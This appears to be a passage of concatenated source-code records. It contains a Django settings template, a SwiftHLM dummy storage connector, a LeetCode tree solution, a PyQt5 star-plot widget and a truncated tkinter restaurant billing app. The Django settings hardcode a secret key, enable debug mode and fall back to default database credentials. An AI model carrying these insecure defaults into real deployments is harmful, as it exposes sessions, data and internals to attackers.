os.path.dirname(os.path.dirname(__file__))\nSECRET_KEY = 'r269$heh9at2cot+5l$*$4&xzwsfbbg0&&^prr+e&oh)_4-+ga'\nDEBUG = True\nTEMPLATE_DEBUG = True\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = os.path.join(BASE_DIR, \".static\")\nSTATIC_URL = '/static/'\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n]\nROOT_URLCONF = '{{ project_name }}.urls'\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n 'storages',\n 'bakery',\n 'calaccess_raw',\n 'calaccess_campaign_browser',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ.get('MYSQL_DATABASE', 'calaccess'),\n 'USER': os.environ.get('MYSQL_USER', 'ccdc'),\n 'PASSWORD': os.environ.get('MYSQL_PASSWORD', 'ccdc'),\n 'HOST': os.environ.get('MYSQL_HOST', 'localhost'),\n 'PORT': os.environ.get('MYSQL_PORT', '3306'),\n 'OPTIONS': {\n 'local_infile': 1,\n }\n }\n}\n","sub_path":"project_name/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"597628107","text":"#!/usr/bin/python\n\n# (C) Copyright 2017 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis file implements SwiftHLM Dummy Backend Connector, a reference\nimplementation reusable for implementing a SwiftHLM Backend Connector for your\nown HLM storage backend, which is considered backend-specific and external for\nSwiftHLM. 
Any SwiftHLM Backend Connector implementation must implement\nSwiftHlmBackendConnector class and its public method for SwiftHLM Generic\nBackend API used between SwiftHLM and SwiftHLM Connector.\n\n*** SwiftHLM Generic Backend API version 0.2.1 ***\n(3-digit API versions such as 0.2.1 should be considered\ndevelopmental and not stable)\n\n response = SwiftHlmBackendConnector.submit_request_get_response(request)\n\nrequest =\n {\n command : status, \n objects : \n [\n { object : /a/c/obj1, file : /srv/node/filepath1 },\n { object : /a/c/obj2, file : /srv/node/filepath2 }\n ]\n }\n\nresponse = \n {\n objects : \n [\n {object : /a/c/obj1, file : /srv/node/filepath1, status : migrated},\n {object : /a/c/obj2, file : /srv/node/filepath2, status : resident},\n {object : /a/c/obj3, file : /srv/node/filepath3, status : premigrated}, \n {object : /a/c/obj4, file : /srv/node/filepath4, status : unknown}\n ]\n }\n\nThe data structures used are dictionary and list, the values are strings,\nshown above unquoted and additionally indented for easier reading.\n\nIn addition to 'status', other requests are 'migrate' or 'recall' for which the\nresponse is an integer:\n 0 - success\n 1 - 1 or more objects could not be migrated/recalled\n 2 - unable to process request for all objects (e.g. cannot invoke backend)\n\nInternal methods of SwiftHlmBackendConnector are backend specific, and\ntypically involve reformatting the list of objects and files to be migrated,\nsubmitting the list and the operation to backend, and receiving response from\nbackend. Typically it is the backend that moves data between LLM (low latency media)\nand HLM (high latency media) and changes or reports replica state. For other\ntypes of HLM backend the data move and state management function may be\nimplemented in the SwiftHLM Backend Connector of that backend. 
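\n\nIllustrative use (names as defined in this module; 'request' is a dict in the GBI format above):\n\n connector = SwiftHlmBackendConnector()\n response = connector.submit_request_get_response(request)\n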
\n\nAuthors:\nSlavisa Sarafijanovic (sla@zurich.ibm.com)\n\n\"\"\"\n\nfrom sys import stdin, stdout \nfrom collections import defaultdict\n#from swift.common import read_config_file\nimport ConfigParser\nfrom swift.common.utils import readconf\nfrom swift.common.utils import json, get_logger, split_path\nimport logging\n\nfrom swift.obj.server import ObjectController\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.exceptions import ConnectionTimeout, DiskFileQuarantined, \\\n DiskFileNotExist, DiskFileCollision, DiskFileNoSpace, DiskFileDeleted, \\\n DiskFileDeviceUnavailable, DiskFileExpired, ChunkReadTimeout, \\\n DiskFileXattrNotSupported\nfrom swift.common.swob import HTTPAccepted, HTTPBadRequest, HTTPCreated, \\\n HTTPInternalServerError, HTTPNoContent, HTTPNotFound, \\\n HTTPPreconditionFailed, HTTPRequestTimeout, HTTPUnprocessableEntity, \\\n HTTPClientDisconnect, HTTPMethodNotAllowed, Request, Response, \\\n HTTPInsufficientStorage, HTTPForbidden, HTTPException, HeaderKeyDict, \\\n HTTPConflict, HTTPServerError\nimport os\n\n#scor aux\nfrom swift.proxy.controllers.base import get_container_info\n\n#scor aux\nfrom swift.common.utils import hash_path\n\n\n# SwiftHLM Backend Connector\nclass SwiftHlmBackendConnector(object):\n\n def __init__(self):\n self.__request_in = {}\n self.__request_out = {}\n self.__response_in = {}\n self.__response_out = {}\n\n # Config\n configFile = r'/etc/swift/object-server.conf'\n self.conf = readconf(configFile) \n\n # Logging\n hlm_stor_node_config = self.conf.get('hlm', None)\n if hlm_stor_node_config:\n hlm_stor_node_log_level = hlm_stor_node_config.get('set log_level',\n None)\n if hlm_stor_node_log_level:\n self.conf['log_level'] = hlm_stor_node_log_level\n self.logger = get_logger(self.conf, name='hlm-connector',\n log_route='swifthlm', fmt=\"%(server)s: %(msecs)03d \"\n \"[%(filename)s:%(funcName)20s():%(lineno)s] %(message)s\")\n\n self.logger.info('info: Initialized Connector')\n self.logger.debug('dbg: Initialized Connector')\n #self.logger.info('conf: %s', self.conf)\n\n # Next method is to be invoked by SwiftHLM Handler using SwiftHLM Generic\n # Backend Interface (GBI) declared above in this file. It adapts SwiftHLM\n # request for an assumed dummy storage backend, mocks invoking the dummy\n # backend operations, reformats the backend response to GBI format, and\n # returns the response to SwitHLM handler\n def submit_request_get_response(self, request):\n self.__receive_request(request)\n self.__reformat_swifthlm_request_to_specific_backend_api()\n self.__submit_request_to_backend_get_response()\n self.__reformat_backend_response_to_generic_backend_api() \n return self.__response_out\n\n # This exemplary private method receives the request from SwiftHLM Handler \n def __receive_request(self, request):\n \n self.logger.debug('Receiving request from Handler')\n self.__request_in = request\n\n return\n \n # This exemplary private method reformats request to backend API\n # Some backends expect as input a file that lists the object data files to\n # be migrated or recalled. 
For this dummy backend connector it just copies\n # the incoming request\n def __reformat_swifthlm_request_to_specific_backend_api(self):\n\n self.logger.debug('Reformatting request to the specific Backend API')\n self.logger.debug('request_in: %s', self.__request_in)\n \n # Backend specific part, for the assumed dummy backend just copies the\n # incoming request\n self.__request_out = self.__request_in\n\n return\n\n # This exemplary method submits request to Backend and gets Response from\n # Backend. Currently the dummy backend is not implemented and object state\n # is not stored, instead response for migrate or recall is always 0\n # (success) and for 'status' it is always 'resident' \n # TODO(Slavisa): Implement a somewhat improved dummy backend that simply\n # stores object state resident/premigrated/migrated, using filepath as the\n # database entries key, into a simple database on file\n # SwiftHLM-Dummy-Backend.db stored under a configurable path (e.g.\n # /tmp/swifthlm for local and /cluster_fs/tmp/swifthlm for clustered file\n # backends)\n\n def __submit_request_to_backend_get_response(self):\n \n self.logger.debug('Submitting request to backend')\n # migrate or recall\n if self.__request_out['request'] in {'migrate', 'recall'}:\n self.__response_in = 0 \n return\n # status\n objects_files_statuses = [] \n for object_file in self.__request_out['objects']: \n object_file_status = {}\n object_file_status['object'] = object_file['object']\n object_file_status['file'] = object_file['file']\n object_file_status['status'] = 'resident'\n objects_files_statuses.append(object_file_status)\n self.__response_in['objects'] = objects_files_statuses\n #self.__response_in = self.__request_out\n\n return\n\n def __reformat_backend_response_to_generic_backend_api(self):\n\n self.logger.debug('Reformatting response to Generic Backend API')\n self.logger.debug('response_in: %s', self.__response_in)\n \n # Backend specific part, for the assumed dummy backend it just copies the\n # incoming response from the backend\n self.__response_out = self.__response_in\n\n return\n\nif __name__ == '__main__':\n # SwiftHlmConnector class is not assumed to be used standalone, instead it\n # is imported for a configured backend by SwiftHLM Handler and invoked from\n # the Handler. 
Alternatively it could be modified to be invoked as a new\n # process and/or remotely similar to SwiftHLM Dispatcher invoking SwiftHLM\n # Handler\n raise RuntimeError('SwiftHlmBackendConnector is not meant to be run standalone')\n\n","sub_path":"swifthlm/dummy_connector.py","file_name":"dummy_connector.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"574486121","text":"#\n# @lc app=leetcode.cn id=106 lang=python3\n#\n# [106] Construct Binary Tree from Inorder and Postorder Traversal\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, inorder: List[int], postorder: List[int]) -> TreeNode:\n # postorder: left-right-root\n # Key: use inorder to determine the lengths of the left and right subtrees\n inorder_mem = {v:i for i,v in enumerate(inorder)}\n\n def traverse(postorder, in_begin, in_end):\n if not postorder: return None\n root = postorder[-1]\n in_idx = inorder_mem[root]\n # The following 4 lines are the most error-prone part\n left_len = in_idx - in_begin\n right_len = in_end - in_begin - left_len\n node = TreeNode(root)\n node.right = traverse(postorder[-1-right_len:-1], in_idx+1, in_end)\n node.left = traverse(postorder[:-1-right_len], in_begin, in_idx-1)\n return node\n\n return traverse(postorder, 0, len(postorder)-1)\n\n\n\n# @lc code=end\n\n","sub_path":"Week_02/106_从中序与后序遍历序列构造二叉树.py","file_name":"106_从中序与后序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"67587032","text":"\nfrom PyQt5.QtGui import QPainter, QColor, QTransform, QFont, QPen, QCursor, QVector2D, QFontMetrics\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom vis.VisWidget import VisWidget\nfrom data import Relation\nimport math\n\n\nclass StarPlot(VisWidget):\n \"\"\"\n Radial star plot with multiple axes.\n \"\"\"\n\n canvasAreaChanged = pyqtSignal()\n axisChanged = pyqtSignal()\n selectionChanged = pyqtSignal()\n\n def __init__(self):\n super().__init__()\n\n self.__bgColor = QColor(255, 255, 255)\n self.scene().setBackgroundBrush(self.__bgColor)\n\n self.labelFont = QFont('Decorative', 8)\n\n self.class1Color = Qt.red\n self.class2Color = Qt.blue\n self.class1Pen = QPen(self.class1Color)\n self.class2Pen = QPen(self.class2Color)\n\n self.axes = []\n self.axisAngles = []\n self.axisLabels = []\n self.lineGroups = []\n\n self.highlightedItems = set()\n self.highlightedRings = set()\n self.activeClasses = set()\n\n # timer for delayed plot update on resize events\n self.resizeUpdateDelay = 150\n self.__resizeDelayTimer = QTimer(self)\n self.__resizeDelayTimer.timeout.connect(self.canvasAreaChanged.emit)\n\n self.selectionUpdateDelay = 200\n self.__selectionUpdateTimer = QTimer(self)\n self.__selectionUpdateTimer.timeout.connect(self.selectionChanged.emit)\n\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.setDragMode(QGraphicsView.RubberBandDrag)\n\n self.rubberBandChanged.connect(self.selectData)\n self.setCacheMode(QGraphicsView.CacheBackground)\n\n self.colorDialog = QColorDialog()\n\n @property\n def bgColor(self):\n \"\"\"Get the background color.\n \"\"\"\n return self.__bgColor\n\n @bgColor.setter\n def bgColor(self, color):\n \"\"\"Set the background color.\n \"\"\"\n self.__bgColor = color\n self.scene().setBackgroundBrush(self.__bgColor)\n\n def getClassColor(self, cls):\n if self.plotPalette is None or cls not in self.plotPalette:\n return QColor()\n\n return 
self.plotPalette[cls]\n\n def setRelation(self, rel: Relation):\n super().setRelation(rel)\n self.activeClasses = self.relation.activeClasses\n\n def updateWidget(self):\n self.setUpdatesEnabled(False)\n\n if self.relation is None:\n return\n\n # save axis rotations, but only if we don't have a new dataset with a different number of axes\n self.axisAngles.clear()\n if len(self.axes) == len(self.relation.fieldNames) - 1:\n for a in self.axes:\n self.axisAngles.append(a.rotation())\n\n self.lineGroups.clear()\n self.highlightedItems.clear()\n self.highlightedRings.clear()\n self.axisLabels.clear()\n self.axes.clear()\n self.scene().clear()\n\n self.addAxes()\n self.addPoints()\n\n if self.axisAngles:\n self.reparentLines()\n\n self.setUpdatesEnabled(True)\n\n def addAxes(self):\n \"\"\"Add one axis per data dimension to the graph.\n \"\"\"\n numDims = len(self.relation.fieldNames) - 1\n angle = 360 / numDims\n axisDomains = self.relation.axisDomains\n for i in range(numDims):\n axis = PlotAxis(self)\n self.scene().addItem(axis)\n if self.axisAngles and i < len(self.axisAngles):\n axis.setRotation(self.axisAngles[i])\n else:\n axis.setRotation(angle * i)\n self.axes.append(axis)\n\n domain = axisDomains[i]\n text = PlotAxisLabel(\"{}\\n[{:.2f},{:.2f}]\".format(self.relation.fieldNames[i], domain[0], domain[1]))\n text.setFont(self.labelFont)\n self.axisLabels.append(text)\n text.setParentItem(axis)\n\n def addPoints(self):\n \"\"\"Add the data points and their connecting lines to the graph.\n \"\"\"\n numDims = len(self.relation.fieldNames) - 1\n datasets = self.relation.getScaledDatasets()\n for ds in datasets:\n points = []\n lines = []\n for i in range(numDims):\n p = PlotPoint(self, ds[i], ds[-1])\n p.setParentItem(self.axes[i])\n points.append(p)\n\n if 0 < i:\n lines.append(PlotLine(self, points[i - 1], p))\n if i == numDims - 1:\n lines.append(PlotLine(self, p, points[0]))\n\n group = self.scene().createItemGroup(lines)\n group.dataClassLabel = points[0].cls\n self.lineGroups.append(group)\n\n def reparentLines(self):\n for lg in self.lineGroups:\n lines = lg.childItems()\n lines = list(sorted(lines, key=lambda x: x.p1.parentItem().rotation()))\n\n numDims = len(lines)\n for i, l in enumerate(lines):\n l.p2 = lines[i + 1 if i + 1 < numDims else 0].p1\n\n def filterClasses(self, classes):\n \"\"\"\n Filter classes without reloading the dataset.\n L{StarPlot.activeClasses} contains all currently active classes.\n\n @param classes class names to filter by\n \"\"\"\n items = self.scene().items()\n for i in items:\n if type(i) == PlotLine or type(i) == PlotPoint:\n i.setVisible(i.cls in classes)\n\n self.activeClasses = classes\n\n def mouseDoubleClickEvent(self, event):\n self.colorDialog.setCurrentColor(self.bgColor)\n self.colorDialog.open(self._setBackgroundColor)\n\n def _setBackgroundColor(self):\n self.bgColor = self.sender().currentColor()\n\n def resizeEvent(self, event):\n self.setUpdatesEnabled(False)\n super().resizeEvent(event)\n # center scene in viewport\n r = self.rect()\n t = QTransform()\n t.translate(-r.width() / 2, -r.height() / 2)\n r = QRectF(QPointF(r.x(), r.y()) * t, QSizeF(r.width(), r.height()))\n self.setSceneRect(r)\n self.__resizeDelayTimer.start(self.resizeUpdateDelay)\n self.setUpdatesEnabled(True)\n\n def selectData(self, rubberBandRect, fromScenePoint, toScenePoint):\n \"\"\"Highlight the rings of data points hit by the rubber-band selection. 
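A plain drag replaces the current selection, Shift-drag adds the hit rings to it, and Ctrl-drag removes them.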
\n \"\"\"\n if fromScenePoint == toScenePoint:\n return\n\n if QApplication.keyboardModifiers() != Qt.ShiftModifier and QApplication.keyboardModifiers() != Qt.ControlModifier:\n # unselect all currently selected items\n for h in self.highlightedItems:\n h.highlighted = False\n self.highlightedItems.clear()\n self.highlightedRings.clear()\n\n sel = self.items(rubberBandRect)\n for s in sel:\n if type(s) == PlotLine:\n parent = s.parentItem()\n siblings = parent.childItems()\n\n if QApplication.keyboardModifiers() == Qt.ControlModifier:\n for sib in siblings:\n if sib in self.highlightedItems:\n sib.highlighted = False\n self.highlightedItems.remove(sib)\n if parent in self.highlightedRings:\n self.highlightedRings.remove(parent)\n else:\n for sib in siblings:\n sib.highlighted = True\n self.highlightedItems.add(sib)\n self.highlightedRings.add(parent)\n\n self.__selectionUpdateTimer.start(self.selectionUpdateDelay)\n\n def sizeHint(self):\n return QSize(1000, 1000)\n\n def minimumSizeHint(self):\n return QSize(400, 400)\n\n\nclass PlotAxis(QGraphicsObject):\n ItemAxisLenHasChanged = 0x9901\n\n def __init__(self, view):\n super().__init__()\n self.view = view\n\n self.p1 = QPoint(0, 0)\n self.p2 = QPoint(0, 0)\n\n self.paddingHoriz = 30\n self.paddingVert = 60 + QFontMetrics(self.view.labelFont).height() * 2\n self.__canvasW = view.rect().size().width() - self.paddingHoriz\n self.__canvasH = view.rect().size().height() - self.paddingVert\n\n self.axesColor = QColor(150, 150, 150)\n self.axesWidth = 1\n self.axesWidthHighl = 3\n self.axisGrabbed = False\n self.axesPen = QPen(self.axesColor, self.axesWidth)\n\n self.setAcceptHoverEvents(True)\n self.setAcceptDrops(True)\n self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)\n\n self.__canvasMaxDim = 0\n self.__boundingRect = None\n\n # save original rotation during axis reordering\n self.__origRotation = self.rotation()\n self.__dragActive = False\n\n self.axisAnimation = QPropertyAnimation(self, b\"relativeRotation\")\n self.axisAnimation.setDuration(600)\n self.axisAnimation.setEasingCurve(QEasingCurve.InOutQuad)\n self.__relRotationStartValue = 0\n\n self.view.canvasAreaChanged.connect(self.updateCanvasGeometry)\n\n def initRelativeRotation(self):\n \"\"\"\n When animating rotation using the L{relativeRotation}, call this method before\n starting the animation. Otherwise relative angles will be added up resulting in a much\n larger rotation than intended.\n \"\"\"\n self.__relRotationStartValue = self.rotation()\n\n @pyqtProperty(float)\n def relativeRotation(self):\n \"\"\"\n Q_PROPERTY for animating relative rotations. Fix the initial rotation first using\n L{initRelativeRotation()} before starting the animation.\n\n @return: current rotation\n \"\"\"\n return self.rotation()\n\n @relativeRotation.setter\n def relativeRotation(self, rot):\n \"\"\"\n Q_PROPERTY for animating relative rotations. 
Fix the initial rotation first using\n L{initRelativeRotation()} before starting the animation.\n \"\"\"\n self.setRotation((self.__relRotationStartValue + rot) % 360)\n\n def hoverEnterEvent(self, event):\n self.axesPen.setWidth(self.axesWidthHighl)\n self.setCursor(Qt.PointingHandCursor)\n self.update()\n\n def hoverLeaveEvent(self, event):\n self.axesPen.setWidth(self.axesWidth)\n self.setCursor(Qt.ArrowCursor)\n self.update()\n\n def mousePressEvent(self, event):\n self.axisGrabbed = True\n self.setCursor(Qt.ClosedHandCursor)\n\n if not self.__dragActive:\n self.__origRotation = self.rotation()\n self.__dragActive = True\n\n def mouseMoveEvent(self, event):\n if self.__dragActive:\n mousePos = self.view.mapToScene(self.view.mapFromGlobal(QCursor.pos()))\n vec1 = QVector2D(mousePos)\n vec1.normalize()\n trans = QTransform()\n trans.rotate(self.rotation())\n vec2 = QVector2D(self.p2 * trans)\n vec2.normalize()\n angle = math.acos(max(-1, min(1, QVector2D.dotProduct(vec1, vec2)))) * 180 / math.pi\n\n # clockwise rotation\n if vec1.y() * vec2.x() < vec1.x() * vec2.y():\n angle *= -1\n\n angle = (self.rotation() + angle) % 360\n self.setRotation(angle)\n\n def mouseReleaseEvent(self, event):\n self.axisGrabbed = False\n self.setCursor(Qt.PointingHandCursor)\n\n if self.__dragActive:\n relRotation = (self.rotation() - self.__origRotation) % 360\n clockwise = (relRotation <= 180)\n angleModifier = 360 - self.__origRotation\n relOwnAngle = (self.rotation() + angleModifier) % 360\n angleDiff = 360 / len(self.view.axes)\n numSteps = 0\n for a in self.view.axes:\n if a == self:\n continue\n\n r = a.rotation()\n relAngle = (r + angleModifier) % 360\n if clockwise and relAngle - relOwnAngle < 0:\n a.axisAnimation.setStartValue(0)\n a.axisAnimation.setEndValue(-angleDiff)\n a.initRelativeRotation()\n a.axisAnimation.start()\n numSteps += 1\n elif not clockwise and relAngle - relOwnAngle > 0:\n a.axisAnimation.setStartValue(0)\n a.axisAnimation.setEndValue(angleDiff)\n a.initRelativeRotation()\n a.axisAnimation.start()\n numSteps -= 1\n\n newRot = (self.__origRotation + (numSteps * angleDiff)) % 360\n relRotation = newRot - self.rotation()\n # make sure we don't rotate a full circle when crossing 0°\n if relRotation < -180:\n relRotation %= 360\n\n self.axisAnimation.setStartValue(0)\n self.axisAnimation.setEndValue(relRotation)\n self.initRelativeRotation()\n self.axisAnimation.start()\n self.__origRotation = newRot\n\n # redraw all lines between points of neighboring axes\n self.view.reparentLines()\n self.__dragActive = False\n\n def updateCanvasGeometry(self):\n self.view.setUpdatesEnabled(False)\n self.__canvasW = self.view.rect().size().width() - self.paddingHoriz\n self.__canvasH = self.view.rect().size().height() - self.paddingVert\n self.__canvasMaxDim = min(self.__canvasW, self.__canvasH)\n lw = max(self.axesWidth, self.axesWidthHighl) / 2 + 4\n self.__boundingRect = QRectF(QPoint(0 - lw, 0 - lw), QPoint(self.__canvasMaxDim / 2 + lw, lw))\n self.itemChange(self.ItemAxisLenHasChanged, None)\n self.view.setUpdatesEnabled(True)\n\n def itemChange(self, change, variant):\n if change == self.ItemAxisLenHasChanged or \\\n (change == QGraphicsItem.ItemRotationHasChanged and self.view.relation.numDatasets < 200):\n self.view.axisChanged.emit()\n return super().itemChange(change, variant)\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget=None):\n qp.setPen(self.axesPen)\n self.p2 = QPoint(min(self.__canvasW, self.__canvasH) / 2, 0)\n qp.drawLine(self.p1, 
self.p2)\n\n def boundingRect(self):\n if self.__boundingRect is None:\n self.updateCanvasGeometry()\n return self.__boundingRect\n\n\nclass PlotAxisLabel(QGraphicsTextItem):\n def __init__(self, text):\n super().__init__(text)\n self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget=None):\n p = self.parentItem()\n pRot = p.rotation()\n trans = QTransform()\n trans.rotate(-p.rotation())\n\n p2Scene = p.mapToScene(p.p2)\n if 0 <= pRot < 90:\n trans.translate(p2Scene.x() - self.boundingRect().width(), p2Scene.y())\n elif 90 <= pRot < 180:\n trans.translate(p2Scene.x(), p2Scene.y())\n elif 180 <= pRot < 270:\n trans.translate(p2Scene.x(), p2Scene.y() - self.boundingRect().height())\n elif 270 <= pRot < 360:\n trans.translate(p2Scene.x() - self.boundingRect().width(), p2Scene.y() - self.boundingRect().height())\n self.setTransform(trans)\n\n super().paint(qp, option, widget)\n\n\nclass PlotPoint(QGraphicsItem):\n def __init__(self, view, val, cls):\n super().__init__()\n self.val = val\n self.cls = cls\n self.view = view\n\n self.__axisLen = 0\n self.__boundingRect = None\n\n self._pen = None\n\n self.updateColor()\n view.plotPaletteChanged.connect(self.updateColor)\n view.axisChanged.connect(self.updateAxisLen)\n\n def updateColor(self):\n self._pen = QPen(self.view.getClassColor(self.cls))\n\n def updateAxisLen(self):\n self.__axisLen = self.parentItem().boundingRect().width()\n self.__boundingRect = QRectF(QPoint(self.val * self.__axisLen - 2, -2), QPoint(self.val * self.__axisLen + 2, 2))\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget = None):\n qp.setPen(self._pen)\n qp.drawRect(self.boundingRect())\n\n def boundingRect(self):\n if self.__boundingRect is None:\n self.updateAxisLen()\n return self.__boundingRect\n\n\nclass PlotLine(QGraphicsLineItem):\n def __init__(self, view, p1, p2):\n super().__init__()\n self.p1 = p1\n self.p2 = p2\n self.cls = p1.cls\n self.view = view\n self.highlighted = False\n self.lineWidth = 1\n self.lineWidthHighl = 4\n self._pen = None\n self._penHighl = None\n\n self.updateColor()\n self.updateLine()\n view.plotPaletteChanged.connect(self.updateColor)\n view.axisChanged.connect(self.updateLine)\n\n def updateColor(self):\n color = self.view.getClassColor(self.cls)\n self._pen = QPen(color)\n self._pen.setWidth(self.lineWidth)\n colorHighl = QColor(color)\n colorHighl.setAlpha(255)\n self._penHighl = QPen(colorHighl)\n self._penHighl.setWidth(self.lineWidthHighl)\n\n def updateLine(self):\n p1 = self.p1.mapToScene(self.p1.boundingRect().center())\n p2 = self.p2.mapToScene(self.p2.boundingRect().center())\n self.setLine(QLineF(p1, p2))\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget = None):\n self.setPen(self._pen if not self.highlighted else self._penHighl)\n super().paint(qp, option, widget)\n\n","sub_path":"QtWekaWrapper/vis/StarPlot.py","file_name":"StarPlot.py","file_ext":"py","file_size_in_byte":17499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"630630146","text":"import tkinter\r\nimport sqlite3\r\nfrom tkinter import *\r\nimport time\r\nimport random\r\nfrom PIL import Image,ImageTk\r\n\r\n\r\nroot=Tk()\r\nroot.geometry(\"1500x500\")\r\n#table=sqlite3.connect(\"restaurant1.db\")\r\n#table.execute('''CREATE TABLE ORDERS\r\n#(ORDER_NUMBER INT PRIMARY KEY NOT NULL,FRIES_MEAL INT,LUNCH_MEAL INT,BURGER_MEAL INT,PIZZA_MEAL INT,CHEESE_BURGER 
INT,DRINKS INT,COST INT,SERVICE_CHARGE FLOAT,TAX FLOAT,SUBTOTAL FLOAT,TOTAL FLOAT);''')\r\n#table.commit()\r\n\r\ndef price():\r\n master = Tk()\r\n master.geometry(\"550x650\")\r\n f1 = Frame(master)\r\n f1.pack(side=TOP)\r\n x = Label(f1, text=\"PRICE LIST\\n\",font=(\"comic sans ms\",\"20\",\"underline\",\"bold\"),fg=\"steel blue\")\r\n x.pack()\r\n\r\n f2 = Frame(master)\r\n f2.pack(side=LEFT)\r\n a1 = Label(f2, text=\"ITEMS\\n\",font=(\"comic sans ms\",\"15\",\"underline\"),fg=\"steel blue\")\r\n a1.pack()\r\n a = Label(f2, text=\"FRIES MEAL\\n\\nLUNCH MEAL\\n\\nBURGER MEAL\\n\\nPIZZA MEAL\\n\\nCHEESE BURGER\\n\\nDRINKS\\n\\nMEAL 1-\\nFRIES MEAL+BURGER MEAL+DRINKS\\n\\nMEAL 2-\\nPIZZA MEAL+CHEESE BURGER+DRINKS\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\n a.pack()\r\n\r\n f3 = Frame(master)\r\n f3.pack(side=RIGHT)\r\n b1 = Label(f3, text=\"PRICE\\n\",font=(\"comic sans ms\",\"15\",\"underline\"),fg=\"steel blue\")\r\n b1.pack()\r\n b = Label(f3, text=\"Rs 100\\n\\nRs 230\\n\\nRs 155\\n\\nRs 440\\n\\nRs 150\\n\\nRs 50\\n\\n\\nRs 250\\n\\n\\nRs 500\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\n b.pack()\r\n\r\n master.mainloop()\r\n\r\nclass Calculate:\r\n def price(self,e2,e3,e4,e5,e6,e7,m1,m2):\r\n a = e2.get()\r\n b = e3.get()\r\n c = e4.get()\r\n d = e5.get()\r\n e = e6.get()\r\n f = e7.get()\r\n g = m1.get()\r\n h = m2.get()\r\n costofmeal = str(int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500)\r\n charge = str((int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500) / 99)\r\n pay = str((int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500) * 0.10)\r\n tt = str(float(costofmeal) + float(charge) + float(pay))\r\n cost.set(costofmeal)\r\n service.set(charge)\r\n tax.set(pay)\r\n final.set(tt)\r\n\r\ndef amount():\r\n c=Calculate()\r\n c.price(e2,e3,e4,e5,e6,e7,m1,m2)\r\n\r\n\r\nran=StringVar()\r\ncost=StringVar()\r\nservice=StringVar()\r\ntax=StringVar()\r\nfinal=StringVar()\r\n\r\n\r\nx=random.randint(1,500)\r\norder=str(x)\r\nran.set(order)\r\n\r\n\r\n\r\ndef reset():\r\n e2.delete(0,END)\r\n e3.delete(0,END)\r\n e4.delete(0,END)\r\n e5.delete(0,END)\r\n e6.delete(0,END)\r\n e7.delete(0,END)\r\n m1.delete(0, END)\r\n m2.delete(0, END)\r\n cost.set(\"\")\r\n service.set(\"\")\r\n tax.set(\"\")\r\n final.set(\"\")\r\n\r\n#****************************************************************\r\n\r\n\r\nframe1=Frame(root)\r\nframe1.pack(side=TOP)\r\nx=Label(frame1,text=\"RESTAURANT MANAGEMENT SYSTEM\",font=(\"comic sans ms\",'30',\"bold\",\"underline\"),fg=\"steel blue\",bd=10,anchor=W)\r\nx.grid(row=0,column=0)\r\n\r\nlocaltime=time.asctime(time.localtime(time.time()))\r\ntime_label=Label(frame1,text=localtime,font=(\"comic sans ms\",\"20\",\"bold\",\"italic\"),fg=\"steel blue\",anchor=W)\r\ntime_label.grid(row=1,column=0)\r\n#-----------------------------------------\r\n\r\nframe2=Frame(root)\r\nframe2.pack(side=LEFT)\r\n\r\nlbl1=Label(frame2,text=\"Order No.\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl1.grid(row=0)\r\ne1=Entry(frame2,text=\"Order No.\",textvariable=ran,font=(\"comic sans ms\",\"15\"),fg=\"steel 